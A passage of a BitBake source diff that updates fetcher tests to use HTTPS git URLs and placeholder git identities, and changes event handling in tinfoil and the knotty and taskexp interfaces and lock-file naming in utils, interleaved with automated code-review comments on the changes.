700 stdout = bb.process.run("git rev-parse HEAD",
701 cwd=os.path.join(self.unpackdir, 'git'))
702 unpack_rev = stdout[0].strip()
703 self.assertEqual(orig_rev, unpack_rev)
704
652class FetcherNoNetworkTest(FetcherTest): 705class FetcherNoNetworkTest(FetcherTest):
653 def setUp(self): 706 def setUp(self):
654 super().setUp() 707 super().setUp()
@@ -845,6 +898,8 @@ class FetcherNetworkTest(FetcherTest):
845 prefix='gitfetch_localusehead_') 898 prefix='gitfetch_localusehead_')
846 src_dir = os.path.abspath(src_dir) 899 src_dir = os.path.abspath(src_dir)
847 bb.process.run("git init", cwd=src_dir) 900 bb.process.run("git init", cwd=src_dir)
901 bb.process.run("git config user.email 'you@example.com'", cwd=src_dir)
902 bb.process.run("git config user.name 'Your Name'", cwd=src_dir)
848 bb.process.run("git commit --allow-empty -m'Dummy commit'", 903 bb.process.run("git commit --allow-empty -m'Dummy commit'",
849 cwd=src_dir) 904 cwd=src_dir)
850 # Use other branch than master 905 # Use other branch than master
@@ -918,7 +973,7 @@ class FetcherNetworkTest(FetcherTest):
918 def test_git_submodule_dbus_broker(self): 973 def test_git_submodule_dbus_broker(self):
919 # The following external repositories have show failures in fetch and unpack operations 974 # The following external repositories have show failures in fetch and unpack operations
920 # We want to avoid regressions! 975 # We want to avoid regressions!
921 url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" 976 url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main"
922 fetcher = bb.fetch.Fetch([url], self.d) 977 fetcher = bb.fetch.Fetch([url], self.d)
923 fetcher.download() 978 fetcher.download()
924 # Previous cwd has been deleted 979 # Previous cwd has been deleted
@@ -934,7 +989,7 @@ class FetcherNetworkTest(FetcherTest):
934 989
935 @skipIfNoNetwork() 990 @skipIfNoNetwork()
936 def test_git_submodule_CLI11(self): 991 def test_git_submodule_CLI11(self):
937 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf" 992 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main"
938 fetcher = bb.fetch.Fetch([url], self.d) 993 fetcher = bb.fetch.Fetch([url], self.d)
939 fetcher.download() 994 fetcher.download()
940 # Previous cwd has been deleted 995 # Previous cwd has been deleted
@@ -949,12 +1004,12 @@ class FetcherNetworkTest(FetcherTest):
949 @skipIfNoNetwork() 1004 @skipIfNoNetwork()
950 def test_git_submodule_update_CLI11(self): 1005 def test_git_submodule_update_CLI11(self):
951 """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """ 1006 """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """
952 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714" 1007 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main"
953 fetcher = bb.fetch.Fetch([url], self.d) 1008 fetcher = bb.fetch.Fetch([url], self.d)
954 fetcher.download() 1009 fetcher.download()
955 1010
956 # CLI11 that pulls in a newer nlohmann-json 1011 # CLI11 that pulls in a newer nlohmann-json
957 url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca" 1012 url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main"
958 fetcher = bb.fetch.Fetch([url], self.d) 1013 fetcher = bb.fetch.Fetch([url], self.d)
959 fetcher.download() 1014 fetcher.download()
960 # Previous cwd has been deleted 1015 # Previous cwd has been deleted
@@ -968,7 +1023,7 @@ class FetcherNetworkTest(FetcherTest):
968 1023
969 @skipIfNoNetwork() 1024 @skipIfNoNetwork()
970 def test_git_submodule_aktualizr(self): 1025 def test_git_submodule_aktualizr(self):
971 url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" 1026 url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44"
972 fetcher = bb.fetch.Fetch([url], self.d) 1027 fetcher = bb.fetch.Fetch([url], self.d)
973 fetcher.download() 1028 fetcher.download()
974 # Previous cwd has been deleted 1029 # Previous cwd has been deleted
@@ -988,7 +1043,7 @@ class FetcherNetworkTest(FetcherTest):
988 """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """ 1043 """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """
989 1044
990 # This repository also has submodules where the module (name), path and url do not align 1045 # This repository also has submodules where the module (name), path and url do not align
991 url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699" 1046 url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699;branch=main"
992 fetcher = bb.fetch.Fetch([url], self.d) 1047 fetcher = bb.fetch.Fetch([url], self.d)
993 fetcher.download() 1048 fetcher.download()
994 # Previous cwd has been deleted 1049 # Previous cwd has been deleted
@@ -1046,7 +1101,7 @@ class SVNTest(FetcherTest):
1046 1101
1047 bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir) 1102 bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir)
1048 # Github will emulate SVN. Use this to check if we're downloding... 1103 # Github will emulate SVN. Use this to check if we're downloding...
1049 bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .", 1104 bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .",
1050 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) 1105 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
1051 bb.process.run("svn commit --non-interactive -m 'Add external'", 1106 bb.process.run("svn commit --non-interactive -m 'Add external'",
1052 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) 1107 cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk'))
@@ -1164,7 +1219,7 @@ class FetchLatestVersionTest(FetcherTest):
1164 1219
1165 test_git_uris = { 1220 test_git_uris = {
1166 # version pattern "X.Y.Z" 1221 # version pattern "X.Y.Z"
1167 ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") 1222 ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "")
1168 : "1.99.4", 1223 : "1.99.4",
1169 # version pattern "vX.Y" 1224 # version pattern "vX.Y"
1170 # mirror of git.infradead.org since network issues interfered with testing 1225 # mirror of git.infradead.org since network issues interfered with testing
@@ -1175,7 +1230,7 @@ class FetchLatestVersionTest(FetcherTest):
1175 ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "") 1230 ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "")
1176 : "1.0", 1231 : "1.0",
1177 # version pattern "pkg_name-vX.Y.Z" 1232 # version pattern "pkg_name-vX.Y.Z"
1178 ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") 1233 ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "")
1179 : "1.4.0", 1234 : "1.4.0",
1180 # combination version pattern 1235 # combination version pattern
1181 ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "") 1236 ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "")
@@ -1187,13 +1242,13 @@ class FetchLatestVersionTest(FetcherTest):
1187 : "20120614", 1242 : "20120614",
1188 # packages with a valid UPSTREAM_CHECK_GITTAGREGEX 1243 # packages with a valid UPSTREAM_CHECK_GITTAGREGEX
1189 # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing 1244 # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing
1190 ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))") 1245 ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))")
1191 : "0.4.3", 1246 : "0.4.3",
1192 ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))") 1247 ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))")
1193 : "11.0.0", 1248 : "11.0.0",
1194 ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") 1249 ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))")
1195 : "1.3.59", 1250 : "1.3.59",
1196 ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") 1251 ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))")
1197 : "3.82+dbg0.9", 1252 : "3.82+dbg0.9",
1198 } 1253 }
1199 1254
@@ -1233,11 +1288,11 @@ class FetchLatestVersionTest(FetcherTest):
1233 # 1288 #
1234 # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2 1289 # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2
1235 # https://github.com/apple/cups/releases 1290 # https://github.com/apple/cups/releases
1236 ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") 1291 ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz")
1237 : "2.0.0", 1292 : "2.0.0",
1238 # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz 1293 # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz
1239 # http://ftp.debian.org/debian/pool/main/d/db5.3/ 1294 # http://ftp.debian.org/debian/pool/main/d/db5.3/
1240 ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") 1295 ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz")
1241 : "5.3.10", 1296 : "5.3.10",
1242 } 1297 }
1243 1298
@@ -1283,13 +1338,10 @@ class FetchCheckStatusTest(FetcherTest):
1283 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz", 1338 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.2.tar.gz",
1284 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz", 1339 "http://downloads.yoctoproject.org/releases/sato/sato-engine-0.3.tar.gz",
1285 "https://yoctoproject.org/", 1340 "https://yoctoproject.org/",
1286 "https://yoctoproject.org/documentation", 1341 "https://docs.yoctoproject.org/",
1287 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz", 1342 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz",
1288 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz", 1343 "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz",
1289 "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz", 1344 "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz",
1290 "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz",
1291 "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz",
1292 "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz",
1293 # GitHub releases are hosted on Amazon S3, which doesn't support HEAD 1345 # GitHub releases are hosted on Amazon S3, which doesn't support HEAD
1294 "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz" 1346 "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz"
1295 ] 1347 ]
@@ -1328,6 +1380,8 @@ class GitMakeShallowTest(FetcherTest):
1328 self.gitdir = os.path.join(self.tempdir, 'gitshallow') 1380 self.gitdir = os.path.join(self.tempdir, 'gitshallow')
1329 bb.utils.mkdirhier(self.gitdir) 1381 bb.utils.mkdirhier(self.gitdir)
1330 bb.process.run('git init', cwd=self.gitdir) 1382 bb.process.run('git init', cwd=self.gitdir)
1383 bb.process.run('git config user.email "you@example.com"', cwd=self.gitdir)
1384 bb.process.run('git config user.name "Your Name"', cwd=self.gitdir)
1331 1385
1332 def assertRefs(self, expected_refs): 1386 def assertRefs(self, expected_refs):
1333 actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines() 1387 actual_refs = self.git(['for-each-ref', '--format=%(refname)']).splitlines()
@@ -1451,6 +1505,8 @@ class GitShallowTest(FetcherTest):
1451 1505
1452 bb.utils.mkdirhier(self.srcdir) 1506 bb.utils.mkdirhier(self.srcdir)
1453 self.git('init', cwd=self.srcdir) 1507 self.git('init', cwd=self.srcdir)
1508 self.git('config user.email "you@example.com"', cwd=self.srcdir)
1509 self.git('config user.name "Your Name"', cwd=self.srcdir)
1454 self.d.setVar('WORKDIR', self.tempdir) 1510 self.d.setVar('WORKDIR', self.tempdir)
1455 self.d.setVar('S', self.gitdir) 1511 self.d.setVar('S', self.gitdir)
1456 self.d.delVar('PREMIRRORS') 1512 self.d.delVar('PREMIRRORS')
@@ -1532,6 +1588,7 @@ class GitShallowTest(FetcherTest):
1532 1588
1533 # fetch and unpack, from the shallow tarball 1589 # fetch and unpack, from the shallow tarball
1534 bb.utils.remove(self.gitdir, recurse=True) 1590 bb.utils.remove(self.gitdir, recurse=True)
1591 bb.process.run('chmod u+w -R "%s"' % ud.clonedir)
1535 bb.utils.remove(ud.clonedir, recurse=True) 1592 bb.utils.remove(ud.clonedir, recurse=True)
1536 bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True) 1593 bb.utils.remove(ud.clonedir.replace('gitsource', 'gitsubmodule'), recurse=True)
1537 1594
@@ -1684,6 +1741,8 @@ class GitShallowTest(FetcherTest):
1684 smdir = os.path.join(self.tempdir, 'gitsubmodule') 1741 smdir = os.path.join(self.tempdir, 'gitsubmodule')
1685 bb.utils.mkdirhier(smdir) 1742 bb.utils.mkdirhier(smdir)
1686 self.git('init', cwd=smdir) 1743 self.git('init', cwd=smdir)
1744 self.git('config user.email "you@example.com"', cwd=smdir)
1745 self.git('config user.name "Your Name"', cwd=smdir)
1687 # Make this look like it was cloned from a remote... 1746 # Make this look like it was cloned from a remote...
1688 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir) 1747 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
1689 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir) 1748 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1691,7 +1750,7 @@ class GitShallowTest(FetcherTest):
1691 self.add_empty_file('bsub', cwd=smdir) 1750 self.add_empty_file('bsub', cwd=smdir)
1692 1751
1693 self.git('submodule init', cwd=self.srcdir) 1752 self.git('submodule init', cwd=self.srcdir)
1694 self.git('submodule add file://%s' % smdir, cwd=self.srcdir) 1753 self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
1695 self.git('submodule update', cwd=self.srcdir) 1754 self.git('submodule update', cwd=self.srcdir)
1696 self.git('commit -m submodule -a', cwd=self.srcdir) 1755 self.git('commit -m submodule -a', cwd=self.srcdir)
1697 1756
@@ -1714,6 +1773,8 @@ class GitShallowTest(FetcherTest):
1714 smdir = os.path.join(self.tempdir, 'gitsubmodule') 1773 smdir = os.path.join(self.tempdir, 'gitsubmodule')
1715 bb.utils.mkdirhier(smdir) 1774 bb.utils.mkdirhier(smdir)
1716 self.git('init', cwd=smdir) 1775 self.git('init', cwd=smdir)
1776 self.git('config user.email "you@example.com"', cwd=smdir)
1777 self.git('config user.name "Your Name"', cwd=smdir)
1717 # Make this look like it was cloned from a remote... 1778 # Make this look like it was cloned from a remote...
1718 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir) 1779 self.git('config --add remote.origin.url "%s"' % smdir, cwd=smdir)
1719 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir) 1780 self.git('config --add remote.origin.fetch "+refs/heads/*:refs/remotes/origin/*"', cwd=smdir)
@@ -1721,7 +1782,7 @@ class GitShallowTest(FetcherTest):
1721 self.add_empty_file('bsub', cwd=smdir) 1782 self.add_empty_file('bsub', cwd=smdir)
1722 1783
1723 self.git('submodule init', cwd=self.srcdir) 1784 self.git('submodule init', cwd=self.srcdir)
1724 self.git('submodule add file://%s' % smdir, cwd=self.srcdir) 1785 self.git('-c protocol.file.allow=always submodule add file://%s' % smdir, cwd=self.srcdir)
1725 self.git('submodule update', cwd=self.srcdir) 1786 self.git('submodule update', cwd=self.srcdir)
1726 self.git('commit -m submodule -a', cwd=self.srcdir) 1787 self.git('commit -m submodule -a', cwd=self.srcdir)
1727 1788
@@ -1756,8 +1817,8 @@ class GitShallowTest(FetcherTest):
1756 self.git('annex init', cwd=self.srcdir) 1817 self.git('annex init', cwd=self.srcdir)
1757 open(os.path.join(self.srcdir, 'c'), 'w').close() 1818 open(os.path.join(self.srcdir, 'c'), 'w').close()
1758 self.git('annex add c', cwd=self.srcdir) 1819 self.git('annex add c', cwd=self.srcdir)
1759 self.git('commit -m annex-c -a', cwd=self.srcdir) 1820 self.git('commit --author "Foo Bar <foo@bar>" -m annex-c -a', cwd=self.srcdir)
1760 bb.process.run('chmod u+w -R %s' % os.path.join(self.srcdir, '.git', 'annex')) 1821 bb.process.run('chmod u+w -R %s' % self.srcdir)
1761 1822
1762 uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir 1823 uri = 'gitannex://%s;protocol=file;subdir=${S}' % self.srcdir
1763 fetcher, ud = self.fetch_shallow(uri) 1824 fetcher, ud = self.fetch_shallow(uri)
@@ -1971,7 +2032,7 @@ class GitShallowTest(FetcherTest):
1971 2032
1972 @skipIfNoNetwork() 2033 @skipIfNoNetwork()
1973 def test_bitbake(self): 2034 def test_bitbake(self):
1974 self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir) 2035 self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir)
1975 self.git('config core.bare true', cwd=self.srcdir) 2036 self.git('config core.bare true', cwd=self.srcdir)
1976 self.git('fetch', cwd=self.srcdir) 2037 self.git('fetch', cwd=self.srcdir)
1977 2038
@@ -2032,6 +2093,8 @@ class GitLfsTest(FetcherTest):
2032 2093
2033 bb.utils.mkdirhier(self.srcdir) 2094 bb.utils.mkdirhier(self.srcdir)
2034 self.git('init', cwd=self.srcdir) 2095 self.git('init', cwd=self.srcdir)
2096 self.git('config user.email "you@example.com"', cwd=self.srcdir)
2097 self.git('config user.name "Your Name"', cwd=self.srcdir)
2035 with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs: 2098 with open(os.path.join(self.srcdir, '.gitattributes'), 'wt') as attrs:
2036 attrs.write('*.mp3 filter=lfs -text') 2099 attrs.write('*.mp3 filter=lfs -text')
2037 self.git(['add', '.gitattributes'], cwd=self.srcdir) 2100 self.git(['add', '.gitattributes'], cwd=self.srcdir)
diff --git a/bitbake/lib/bb/tinfoil.py b/bitbake/lib/bb/tinfoil.py
index 8c9b6b8ca5..8bec8cbaf6 100644
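--- a/bitbake/lib/bb/tinfoil.py
+++ b/bitbake/lib/bb/tinfoil.py
@@ -53,6 +53,10 @@ class TinfoilDataStoreConnectorVarHistory:
  def remoteCommand(self, cmd, *args, **kwargs):
  return self.tinfoil.run_command('dataStoreConnectorVarHistCmd', self.dsindex, cmd, args, kwargs)
 
+ def emit(self, var, oval, val, o, d):
+ ret = self.tinfoil.run_command('dataStoreConnectorVarHistCmdEmit', self.dsindex, var, oval, val, d.dsindex)
+ o.write(ret)
+
  def __getattr__(self, name):
  if not hasattr(bb.data_smart.VariableHistory, name):
  raise AttributeError("VariableHistory has no such method %s" % name)
@@ -448,7 +452,7 @@ class Tinfoil:
  self.run_actions(config_params)
  self.recipes_parsed = True
 
- def run_command(self, command, *params):
+ def run_command(self, command, *params, handle_events=True):
  """
  Run a command on the server (as implemented in bb.command).
  Note that there are two types of command - synchronous and
@@ -465,7 +469,16 @@ class Tinfoil:
  commandline = [command]
  if params:
  commandline.extend(params)
- result = self.server_connection.connection.runCommand(commandline)
+ try:
+ result = self.server_connection.connection.runCommand(commandline)
+ finally:
+ while handle_events:
+ event = self.wait_event()
+ if not event:
+ break
+ if isinstance(event, logging.LogRecord):
+ if event.taskpid == 0 or event.levelno > logging.INFO:
+ self.logger.handle(event)
  if result[1]:
  raise TinfoilCommandFailed(result[1])
  return result[0]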
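Review bot: The `run_command` docstring does not mention the new `handle_events` keyword, and with its default of True the `finally` loop consumes every queued event, passing only `LogRecord`s with `taskpid == 0` or a level above INFO to the logger and discarding everything else. A caller that issues a command and then reads events itself through `wait_event()` must pass `handle_events=False`, which is easy to miss from the signature alone. I would add a line such as `handle_events: drain pending events after the command and log server records; pass False when the caller processes events itself`. The docstring continues outside the hunk, so the wording may need merging with text not shown here.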
diff --git a/bitbake/lib/bb/ui/knotty.py b/bitbake/lib/bb/ui/knotty.py
index 87e873d644..d1f74389db 100644
--- a/bitbake/lib/bb/ui/knotty.py
+++ b/bitbake/lib/bb/ui/knotty.py
@@ -227,7 +227,9 @@ class TerminalFilter(object):
227 227
228 def keepAlive(self, t): 228 def keepAlive(self, t):
229 if not self.cuu: 229 if not self.cuu:
230 print("Bitbake still alive (%ds)" % t) 230 print("Bitbake still alive (no events for %ds). Active tasks:" % t)
231 for t in self.helper.running_tasks:
232 print(t)
231 sys.stdout.flush() 233 sys.stdout.flush()
232 234
233 def updateFooter(self): 235 def updateFooter(self):
@@ -380,14 +382,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo
380 "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent", 382 "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent",
381 "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"] 383 "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"]
382 384
385def drain_events_errorhandling(eventHandler):
386 # We don't have logging setup, we do need to show any events we see before exiting
387 event = True
388 logger = bb.msg.logger_create('bitbake', sys.stdout)
389 while event:
390 event = eventHandler.waitEvent(0)
391 if isinstance(event, logging.LogRecord):
392 logger.handle(event)
393
383def main(server, eventHandler, params, tf = TerminalFilter): 394def main(server, eventHandler, params, tf = TerminalFilter):
384 395
385 if not params.observe_only: 396 try:
386 params.updateToServer(server, os.environ.copy()) 397 if not params.observe_only:
398 params.updateToServer(server, os.environ.copy())
387 399
388 includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) 400 includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only)
389 401
390 loglevel, _ = bb.msg.constructLogOptions() 402 loglevel, _ = bb.msg.constructLogOptions()
403 except bb.BBHandledException:
404 drain_events_errorhandling(eventHandler)
405 return 1
391 406
392 if params.options.quiet == 0: 407 if params.options.quiet == 0:
393 console_loglevel = loglevel 408 console_loglevel = loglevel
@@ -584,7 +599,8 @@ def main(server, eventHandler, params, tf = TerminalFilter):
584 warnings = 0 599 warnings = 0
585 taskfailures = [] 600 taskfailures = []
586 601
587 printinterval = 5000 602 printintervaldelta = 10 * 60 # 10 minutes
603 printinterval = printintervaldelta
588 lastprint = time.time() 604 lastprint = time.time()
589 605
590 termfilter = tf(main, helper, console_handlers, params.options.quiet) 606 termfilter = tf(main, helper, console_handlers, params.options.quiet)
@@ -594,7 +610,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
594 try: 610 try:
595 if (lastprint + printinterval) <= time.time(): 611 if (lastprint + printinterval) <= time.time():
596 termfilter.keepAlive(printinterval) 612 termfilter.keepAlive(printinterval)
597 printinterval += 5000 613 printinterval += printintervaldelta
598 event = eventHandler.waitEvent(0) 614 event = eventHandler.waitEvent(0)
599 if event is None: 615 if event is None:
600 if main.shutdown > 1: 616 if main.shutdown > 1:
@@ -625,7 +641,7 @@ def main(server, eventHandler, params, tf = TerminalFilter):
625 641
626 if isinstance(event, logging.LogRecord): 642 if isinstance(event, logging.LogRecord):
627 lastprint = time.time() 643 lastprint = time.time()
628 printinterval = 5000 644 printinterval = printintervaldelta
629 if event.levelno >= bb.msg.BBLogFormatter.ERROR: 645 if event.levelno >= bb.msg.BBLogFormatter.ERROR:
630 errors = errors + 1 646 errors = errors + 1
631 return_value = 1 647 return_value = 1
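Review bot: In `keepAlive` the added loop `for t in self.helper.running_tasks:` reuses the name of the parameter `t`, so once the loop has run `t` no longer holds the elapsed seconds. Nothing after the loop reads it in the lines shown, but a distinct name keeps the method safe to extend: `for task in self.helper.running_tasks:` followed by `print(task)`. The leading comment in `drain_events_errorhandling` would also read better as a docstring saying it is called when `main` catches `bb.BBHandledException` before logging is set up.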
diff --git a/bitbake/lib/bb/ui/taskexp.py b/bitbake/lib/bb/ui/taskexp.py
index 2b246710ca..c00eaf6638 100644
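--- a/bitbake/lib/bb/ui/taskexp.py
+++ b/bitbake/lib/bb/ui/taskexp.py
@@ -8,6 +8,7 @@
 #
 
 import sys
+import traceback
 
 try:
  import gi
@@ -196,6 +197,7 @@ def main(server, eventHandler, params):
  gtkgui.start()
 
  try:
+ params.updateToServer(server, os.environ.copy())
  params.updateFromServer(server)
  cmdline = params.parseActions()
  if not cmdline:
@@ -218,6 +220,9 @@ def main(server, eventHandler, params):
  except client.Fault as x:
  print("XMLRPC Fault getting commandline:\n %s" % x)
  return
+ except Exception as e:
+ print("Exception in startup:\n %s" % traceback.format_exc())
+ return
 
  if gtkthread.quit.isSet():
  return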
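Review bot: The added `params.updateToServer(server, os.environ.copy())` uses `os`, but the import lines visible in the first hunk (`import sys`, `import traceback`) do not include it. Unless `os` is imported elsewhere in the file, that call raises NameError on every start. The new `except Exception as e:` would then catch it, print a traceback and return, so the UI exits quietly rather than failing loudly. If the import is indeed missing, add `import os` beside `import sys`. The name `e` is unused, so `except Exception:` is enough.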
diff --git a/bitbake/lib/bb/utils.py b/bitbake/lib/bb/utils.py
index 5f5767c1da..34fa0b7a67 100644
--- a/bitbake/lib/bb/utils.py
+++ b/bitbake/lib/bb/utils.py
@@ -16,7 +16,8 @@ import bb.msg
16import multiprocessing 16import multiprocessing
17import fcntl 17import fcntl
18import importlib 18import importlib
19from importlib import machinery 19import importlib.machinery
20import importlib.util
20import itertools 21import itertools
21import subprocess 22import subprocess
22import glob 23import glob
@@ -420,12 +421,14 @@ def better_eval(source, locals, extraglobals = None):
420 return eval(source, ctx, locals) 421 return eval(source, ctx, locals)
421 422
422@contextmanager 423@contextmanager
423def fileslocked(files): 424def fileslocked(files, *args, **kwargs):
424 """Context manager for locking and unlocking file locks.""" 425 """Context manager for locking and unlocking file locks."""
425 locks = [] 426 locks = []
426 if files: 427 if files:
427 for lockfile in files: 428 for lockfile in files:
428 locks.append(bb.utils.lockfile(lockfile)) 429 l = bb.utils.lockfile(lockfile, *args, **kwargs)
430 if l is not None:
431 locks.append(l)
429 432
430 try: 433 try:
431 yield 434 yield
@@ -458,9 +461,16 @@ def lockfile(name, shared=False, retry=True, block=False):
458 consider the possibility of sending a signal to the process to break 461 consider the possibility of sending a signal to the process to break
459 out - at which point you want block=True rather than retry=True. 462 out - at which point you want block=True rather than retry=True.
460 """ 463 """
464 basename = os.path.basename(name)
465 if len(basename) > 255:
466 root, ext = os.path.splitext(basename)
467 basename = root[:255 - len(ext)] + ext
468
461 dirname = os.path.dirname(name) 469 dirname = os.path.dirname(name)
462 mkdirhier(dirname) 470 mkdirhier(dirname)
463 471
472 name = os.path.join(dirname, basename)
473
464 if not os.access(dirname, os.W_OK): 474 if not os.access(dirname, os.W_OK):
